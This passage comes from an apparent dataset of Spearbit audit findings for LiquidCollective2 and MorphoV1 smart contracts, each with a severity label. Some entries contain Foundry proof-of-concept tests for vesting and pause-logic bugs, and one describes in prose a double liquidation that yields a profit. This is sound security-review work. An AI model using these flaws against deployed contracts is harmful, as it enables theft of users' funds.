_maxIncrease is used as a measure to enforce the maximum difference between prevTotalEth and postTotalEth, but in practice, it is being used as a mandatory growth factor in the context of coverage funds, which might cause the pulling of funds from the coverage fund to ensure _maxIncrease of revenue in case fees are not high enough.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Medium Risk" + ] + }, + { + "title": "Consider preventing CoverageFundAddress to be set as address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "In the current implementation of River.setCoverageFund and CoverageFundAddress.set, neither function reverts when the _newCoverageFund address parameter is equal to address(0). If the Coverage Fund address is empty, the River._pullCoverageFunds function will return early and will not pull any coverage funds.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Medium Risk" + ] + }, + { + "title": "CoverageFund.initCoverageFundV1 might be front-runnable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Upgradeable contracts are used in the project, mostly relying on a TUPProxy contract. Initializing a contract is a 2-phase process where the first call is the actual deployment and the second call is a call to the init function itself. From our experience with the repository, the upgradeable contracts deployment scripts are using the TUPProxy correctly; however, in this case we were not able to find the deployment script for CoverageFund, so we decided to raise this point to make sure you are following the previous policy also for this contract.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Low Risk" + ] + }, + { + "title": "Account owner of the minted TLC tokens must call delegate to own vote power of initial minted tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The _account owner of the minted TLC tokens must remember to call tlcToken.delegate(accountOwner) to auto-delegate to itself, otherwise it will have zero voting power. Without doing that, anyone (even with just 1 voting power) could make any proposal pass and in the future manage the DAO by proposing, rejecting, or accepting/executing proposals. As the OpenZeppelin ERC20 documentation says: By default, token balance does not account for voting power. This makes transfers cheaper.
The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Low Risk" + ] + }, + { + "title": "Consider using unchecked block to save some gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Because of the if statement, it is impossible for vestedAmount - releasedAmount to underflow, thus allowing the usage of the unchecked block to save a bit of gas.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Gas Optimization" + ] + }, + { + "title": "createVestingSchedule allows the creation of a vesting schedule that could release zero tokens after a period has passed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Depending on the value of duration or amount it is possible to create a vesting schedule that would release zero token after a whole period has elapsed. This is an edge case scenario but would still be possible given that createVestingSchedule can be called by anyone and not only Alluvial. See the following test case for an example //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDistributeZeroPerPeriod() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 365 days, period: 1 days, amount: 100, beneficiary: alice, delegatee: address(0), 15 revocable: true }) ); // One whole period pass and alice check how many tokens she can release vm.warp(block.timestamp + 1 days); uint256 releasable = tlc.computeVestingReleasableAmount(0); assertEq(releasable, 0); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! 
return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "CoverageFund - Checks-Effects-Interactions best practice is violated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "We were not able to find any concrete instances of harmful reentrancy attack vectors in this contract, but it's recommended to follow the Checks-Effects-Interactions pattern anyway.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "River contract allows setting an empty metadata URI", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The current implementation of River.setMetadataURI and MetadataURI.set both allow the current value of the metadata URI to be updated to an empty string.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider requiring that the _cliffDuration is a multiple of _period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "When a vesting schedule is created via _createVestingSchedule, the only check made on the _period parameter (other than being greater than zero) is that the _duration must be a multiple of _period. If after the _cliffDuration the user can already release the matured vested tokens, it could make sense to also require that _cliffDuration % _period == 0.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Add documentation about the scenario where a vesting schedule can be created in the past", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "In the current implementation of the ERC20VestableVotesUpgradeable _createVestingSchedule function, there is no check for the _start value. This means that the creator of a vesting schedule could create a schedule that starts in the past. Allowing the creation of a vesting schedule with a past _start also influences the behavior of _revokeVestingSchedule (see ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked).", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The current implementation of _createVestingSchedule allows the creation of vesting schedules that: Start in the past: _start < block.timestamp. Have already ended: _start + _duration < block.timestamp. Because of this behavior, in case of the creation of a past vesting schedule that has already ended: The _beneficiary can instantly call (if there's no lock period) releaseVestingSchedule to release the whole amount of tokens.
The creator of the vesting schedule cannot call revokeVestingSchedule because the new end would be in the past and the transaction would revert with an InvalidRevokedVestingScheduleEnd error. The second scenario is particularly important because it does not allow the creator to reduce the length or remove the schedule entirely in case the schedule has been created mistakenly or with a misconfiguration (too many tokens vested, lock period too long, etc...).", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "getVestingSchedule returns misleading information if the vesting token creator revokes the schedule", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The getVestingSchedule function returns the information about the created vesting schedule. The duration represents the number of seconds of the vesting period and the amount represents the number of tokens that have been scheduled to be released after the period end (or after lockDuration if it has been configured to be greater than end). If the creator of the vesting schedule calls revokeVestingSchedule, only the end of the vesting schedule struct will be updated. If external contracts or dApps rely only on the getVestingSchedule information, there could be scenarios where they display or base their logic on wrong information. Consider the following example. Alluvial creates a vesting schedule for alice with the following config { \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true } This means that after 10 days, Alice would own in her balance 10 TLC tokens. If Alluvial calls revokeVestingSchedule before the cliff period ends, all of the tokens will be returned to Alluvial but the getVestingSchedule function would still display the same information with just the end attribute updated. An external dApp or contract that does not check the new end and compares it to cliffDuration, lockDuration, and period but only uses the amount would display the wrong number of vested tokens for Alice at a given timestamp.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule. This function returns the value returned by _computeVestedAmount that relies on duration and amount, while the only attribute changed by revokeVestingSchedule is the end.
19 function _computeVestedAmount(VestingSchedules.VestingSchedule memory _vestingSchedule, uint256 _time) internal pure returns (uint256) { if (_time < _vestingSchedule.start + _vestingSchedule.cliffDuration) { // pre-cliff no tokens have been vested return 0; } else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) { // post vesting all tokens have been vested return _vestingSchedule.amount; } else { uint256 timeFromStart = _time - _vestingSchedule.start; // compute tokens vested for completly elapsed periods uint256 vestedDuration = timeFromStart - (timeFromStart % _vestingSchedule.period); return (vestedDuration * _vestingSchedule.amount) / _vestingSchedule.duration; } } If the creator revokes the schedule, the computeVestingVestedAmount would return more tokens compared to the amount that the user has vested in reality. Consider the following example. Alluvial creates a vesting schedule with the following config { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true Alluvial then calls revokeVestingSchedule(0, uint64(block.timestamp + 5 days));. The effect of this trans- action would return 5 tokens to Alluvial and set the new end to block.timestamp + 5 days. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + 7 days), it would return 7 because _computeVestedAmount would execute the code in the else branch. But alice cannot have more than 5 vested tokens because of the previous revoke. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + duration)it would return 10 because _computeVestedAmount would execute the code in the else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) branch. But alice cannot have more than 5 vested tokens because of the previous revoke. Attached test below to reproduce it: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { 20 function __computeVestingReleasableAmount(uint256 vestingID, uint256 _time) external view returns (uint256) { ,! return _computeVestingReleasableAmount( VestingSchedules.get(vestingID), _deterministicVestingEscrow(vestingID), _time ); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal creator; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); creator = makeAddr(\"creator\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testIncorrectComputeVestingVestedAmount() public { vm.prank(initAccount); tlc.transfer(creator, 10); // create a vesting schedule for Alice vm.prank(creator); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); // creator call revokeVestingSchedule revoking the vested schedule setting the new end as half ,! 
of the duration // 5 tokens are returned to the creator and `end` is updated to the new value // this means also that at max alice will have 5 token vested (and releasable) vm.prank(creator); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 5 days)); // We warp at day 7 of the schedule vm.warp(block.timestamp + 7 days); 21 // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 7); // We warp at day 10 (we reached the total duration of the vesting) vm.warp(block.timestamp + 3 days); // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 10); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider writing clear documentation on how the voting power and delegation works", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "ERC20VotesUpgradeable contract. As the official OpenZeppelin documentation says (also reported in the Alluvial's natspec contract): ERC20VestableVotesUpgradeableV1 extension The an of is By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Because of how ERC20VotesUpgradeable behaves on voting power and delegation of voting power could be coun- terintuitive for normal users who are not aware of it, Alluvial should be very explicit on how users should act when a vesting schedule is created for them. When a Vote Token is transferred, ERC20VotesUpgradeable calls the hook _afterTokenTransfer function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual override { super._afterTokenTransfer(from, to, amount); _moveVotingPower(delegates(from), delegates(to), amount); } In this case, _moveVotingPower(delegates(from), delegates(to), amount); will decrease the voting power of delegates(from) by amount and will increase the voting power of delegates(to) by amount. This applies if some conditions are true, but you can see them here function _moveVotingPower( address src, address dst, uint256 amount ) private { if (src != dst && amount > 0) { if (src != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, ,! 
amount); emit DelegateVotesChanged(src, oldWeight, newWeight); } if (dst != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount); emit DelegateVotesChanged(dst, oldWeight, newWeight); } } } When a vesting schedule is created, the creator has two options: 1) Specify a custom delegatee different from the beneficiary (or equal to it, but it's the same as option 2). 2) Leave the delegatee empty (equal to address(0)). Scenario 1) empty delegatee OR delegatee === beneficiary (same thing) After creating the vesting schedule, the voting power of the beneficiary will be equal to the amount of tokens vested. If the beneficiary did not call tlc.delegate(beneficiary) previously, after releasing some tokens, its voting power will be decreased by the amount of released tokens. 23 Scenario 2) delegatee !== beneficiary && delegatee !== address(0) Same thing as before, but now we have two different actors, one is the beneficiary and another one is the delegatee of the voting power of the vested tokens. If the beneficiary did not call tlc.delegate(vestingScheduleDelegatee) previously, after releasing some to- kens, the voting power of the current vested schedule's delegatee will be decreased by the amount of released tokens. Related test for scenario 1 //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testLosingPowerAfterRelease() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: false }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); assertEq(tlc.getVotes(alice), 10); 24 assertEq(tlc.balanceOf(alice), 0); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); tlc.releaseVestingSchedule(0); // Alice now owns the vested tokens just released but her voting power has decreased by the ,! amount released assertEq(tlc.getVotes(alice), 9); assertEq(tlc.balanceOf(alice), 1); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! 
return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Fix mismatch between revert error message and code behavior", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The error message requires the schedule duration to be greater than the cliff duration, but the code allows it to be greater than or equal to the cliff duration.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Improve documentation and naming of period variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Similar to Consider renaming period to periodDuration to be more descriptive, the variable name and documentation are ambiguous. We can give a more descriptive name to the variable and fix the documentation.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider renaming period to periodDuration to be more descriptive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "period can be confused as (for example) a counter or an id.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Inside OracleManager.setConsensusLayerData the coverageFunds variable is declared but never used. Consider cleaning the code by removing the unused variable. The executionLayerFees variable instead should be explicitly initialized to zero to not rely on compiler assumptions.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The IVestingScheduleManager interface contains all the events, errors, and functions that ERC20VestableVotesUpgradeableV1 needs to implement and use. Because there's no corresponding VestingScheduleManager contract implementation, it would make sense to rename the interface to IERC20VestableVotesUpgradeableV1.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider renaming CoverageFundAddress COVERAGE_FUND_ADDRESS to be consistent with the current naming convention", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Consider renaming the constant used to access the unstructured storage slot COVERAGE_FUND_ADDRESS.
To follow the naming convention already adopted across all the contracts, the variable should be renamed to COVERAGE_FUND_ADDRESS_SLOT.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider reverting if the msg.value is zero in CoverageFundV1.donate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "In the current implementation of CoverageFundV1.donate there is no check on the msg.value. Because of this, the sender can \"spam\" the function and emit multiple useless Donate events.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider having a separate function in River contract that allows CoverageFundV1 to send funds instead of using the same function used by ELFeeRecipientV1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "When the River contract calls the CoverageFundV1 contract to pull funds, the CoverageFundV1 sends funds to River by calling IRiverV1(payable(river)).sendELFees{value: amount}();. sendELFees is a function that is currently used by both CoverageFundV1 and ELFeeRecipientV1. function sendELFees() external payable { if (msg.sender != ELFeeRecipientAddress.get() && msg.sender != CoverageFundAddress.get()) { revert LibErrors.Unauthorized(msg.sender); } } It would be cleaner to have a separate function callable only by the CoverageFundV1 contract.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Extensively document how the Coverage Funds contract works", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The Coverage Fund contract has a crucial role inside the Protocol, and the current contract's documentation does not properly cover all the needed aspects. Consider documenting the following aspects: General explanation of the Coverage Fund and its purpose. Will donations happen only after a slash/penalty event? Or is there a \"budget\" that will be dumped on the contract regardless of any slashing events? If a donation of XXX ETH is made, how is it handled? In a single transaction or distributed over a period of time? Explain carefully that when ETH is donated, no shares are minted. Explain all the possible market repercussions of the integration of Coverage Funds. Is there any off-chain validation process before donating?
The @param _beneficiary should be placed before @param _delegatee to follow the function signature order. Natspec missing the @return part for delegateVestingEscrow in IVestingScheduleManager. Wrong natspec comment, operators should be replaced with vesting schedules for @custom:attribute of struct SlotVestingSchedule in VestingSchedules. 30 Wrong natspec parameter, replace operator with vesting schedule in the VestingSchedules.push func- tion. Missing @return natspec for _delegateVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _deterministicVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _getCurrentTime in ERC20VestableVotesUpgradeable. Add the Coverage Funds as a source of \"extra funds\" in the Oracle._pushToRiver natspec documentation in Oracle. Update the InvalidCall natspec in ICoverageFundV1 given that the error is thrown also in the receive() external payable function of CoverageFundV1. Update the natspec of struct VestingSchedule lockDuration attribute in VestingSchedules by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting. Update the natspec of lockDuration in ERC20VestableVotesUpgradeable by explaining that the lock dura- tion of a vesting schedule could possibly exceed the overall duration of the vesting. Consider making the natspec documentation of struct VestingSchedule in VestingSchedules and the natspec in ERC20VestableVotesUpgradeable be in sync. Add more examples (variations) to the natspec documentation of the vesting schedules example in ERC20VestableVotesUpgradeable to explain all the possible combination of scenarios. Make the ERC20VestableVotesUpgradeable natspec documentation about the vesting schedule consis- tent with the natspec documentation of _createVestingSchedule and VestingSchedules struct Vest- ingSchedule. Typos Replace all Overriden instances with Overridden in River. Replace transfer with transfers in ERC20VestableVotesUpgradeable.1.sol#L147. Replace token with tokens in ERC20VestableVotesUpgradeable.1.sol#L156.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Different behavior between River _pullELFees and _pullCoverageFunds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Both _pullELFees and _pullCoverageFunds implement the same functionality: Pull funds from a contract address. Update the balance storage variable. Emit an event. Return the amount of balance collected from the contract. The _pullCoverageFunds differs from the _pullELFees implementation by avoiding both updating the Balance- ToDeposit when collectedCoverageFunds == 0 and emitting the PulledCoverageFunds event. Because they are implementing the same functionality, they should follow the same behavior if there is not an explicit reason to not do so. 
31", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Move local mask variable from Allowlist.1.sol to LibAllowlistMasks.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "LibAllowlistMasks.sol is meant to contain all mask values, but DENY_MASK is a local variable in the Allowlist.1.sol contract.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider adding additional parameters to the existing events to improve filtering/monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Some already defined events could be improved by adding more parameters to better track those events in dApps or monitoring tools. Consider adding address indexed delegatee as an event's parameter to event CreatedVestingSchedule. While it's true that after the vest/lock period the beneficiary will be the owner of those tokens, in the meanwhile (if _delegatee != address(0)) the voting power of all those vested tokens are delegated to the _delegatee. Consider adding address indexed beneficiary to event ReleasedVestingSchedule. Consider adding uint256 newEnd to event RevokedVestingSchedule to track the updated end of the vesting schedule. Consider adding address indexed beneficiary to event DelegatedVestingEscrow. If those events parameters are added to the events, the Alluvial team should also remember to update the relative natspec documentation.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Missing indexed keyword in events parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Some events parameters are missing the indexed keyword. Indexing specific parameters is partic- ularly important to later be able to filter those events both in dApps or monitoring tools. coverageFund event parameter should be declared as indexed in event SetCoverageFund. Both oldDelegatee and newDelegatee should be indexed in event DelegatedVestingEscrow. donator should be declared as indexed in event Donate.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Add natspec documentation to the TLC contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The current implementation of TLC contract is missing natspec at the root level to explain the contract. The natspec should cover the basic explanation of the contract (like it has already been done in other contracts like River.sol) but also illustrate TLC token has a fixed max supply that is minted at deploy time. All the minted tokens are sent to a single account at deploy time. How TLC token will be distributed. How voting power works (you have to delegate to yourself to gain voting power). How the vesting process works. 
Other general information useful for the user/investor that receives the TLC token directly or vested.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Liquidating Morpho's Aave position leads to state desync", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desyncs from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit. Example: There's a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: High Risk" + ] + }, + { + "title": "A market could be deprecated but still prevent liquidators to liquidate borrowers if isLiquidateBor- rowPaused is true", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Currently, when a market must be deprecated, Morpho checks that borrowing has been paused before applying the new value for the flag. function setIsDeprecated(address _poolToken, bool _isDeprecated) external onlyOwner isMarketCreated(_poolToken) { } if (!marketPauseStatus[_poolToken].isBorrowPaused) revert BorrowNotPaused(); marketPauseStatus[_poolToken].isDeprecated = _isDeprecated; emit IsDeprecatedSet(_poolToken, _isDeprecated); The same check should be done in isLiquidateBorrowPaused, allowing the deprecation of a market only if isLiq- uidateBorrowPaused == false otherwise liquidators would not be able to liquidate borrowers on a deprecated market.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "setIsPausedForAllMarkets bypass the check done in setIsBorrowPaused and allow resuming borrow on a deprecated market", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The MorphoGovernance contract allow Morpho to set the isBorrowPaused to false only if the market is not deprecated. function setIsBorrowPaused(address _poolToken, bool _isPaused) external onlyOwner isMarketCreated(_poolToken) { } if (!_isPaused && marketPauseStatus[_poolToken].isDeprecated) revert MarketIsDeprecated(); marketPauseStatus[_poolToken].isBorrowPaused = _isPaused; emit IsBorrowPausedSet(_poolToken, _isPaused); This check is not enforced by the _setPauseStatus function, called by setIsPausedForAllMarkets allowing Mor- pho to resume borrowing for deprecated market. 
Test to reproduce the issue // SPDX-License-Identifier: AGPL-3.0-only pragma solidity ^0.8.0; import \"./setup/TestSetup.sol\"; contract TestSpearbit is TestSetup { using WadRayMath for uint256; function testBorrowPauseCheckSkipped() public { // Deprecate a market morpho.setIsBorrowPaused(aDai, true); morpho.setIsDeprecated(aDai, true); checkPauseEquality(aDai, true, true); // you cannot resume the borrowing if the market is deprecated hevm.expectRevert(abi.encodeWithSignature(\"MarketIsDeprecated()\")); morpho.setIsBorrowPaused(aDai, false); checkPauseEquality(aDai, true, true); // but this check is skipped if I call directly `setIsPausedForAllMarkets` morpho.setIsPausedForAllMarkets(false); // this should revert because // you cannot resume borrowing for a deprecated market checkPauseEquality(aDai, false, true); } function checkPauseEquality( address aToken, bool shouldBePaused, 6 bool shouldBeDeprecated ) public { ( bool isSupplyPaused, bool isBorrowPaused, bool isWithdrawPaused, bool isRepayPaused, bool isLiquidateCollateralPaused, bool isLiquidateBorrowPaused, bool isDeprecated ) = morpho.marketPauseStatus(aToken); assertEq(isBorrowPaused, shouldBePaused); assertEq(isDeprecated, shouldBeDeprecated); } }", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "User withdrawals can fail if Morpho position is close to liquidation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If the Morpho position on Aave's debt / collateral value is higher than the market's max LTV ratio but lower than the market's liquidation threshold, the 